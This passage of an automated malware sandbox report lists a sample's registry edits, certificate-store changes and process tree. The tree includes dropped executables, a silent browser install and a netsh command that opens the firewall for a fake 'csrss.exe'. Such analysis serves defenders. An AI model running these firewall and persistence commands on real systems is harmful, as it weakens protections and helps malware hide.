| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-3052 = "Qyzylorda Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe
"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe
"C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe"
C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe
"C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe
"C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe"
C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe
"C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\ulc.0.exe
"C:\Users\Admin\AppData\Local\Temp\ulc.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1572 -ip 1572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 1020
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
"C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe" --silent --allusers=0
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6e68e1d0,0x6e68e1dc,0x6e68e1e8
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe" --version
C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe
"C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe"
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
"C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3208 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419140451" --session-guid=8aaab569-435b-484d-b795-e57cfab4635d --server-tracking-blob="MDA2MDQ4NDdiNTgyZWQ3ZDNiNDY4Y2RjZWQ0YmViOGQ3YTMwYjMwYzZiMDI4NWY4ODYxYThhZGEzNTJiYzgzZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNTM1NDgwLjY1MjciLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiY2VjMGJlZDYtMDhhNi00MWU4LWI0OGQtOTMxZDZkOGU3NDExIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C05000000000000
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6da0e1d0,0x6da0e1dc,0x6da0e1e8
C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe
"C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
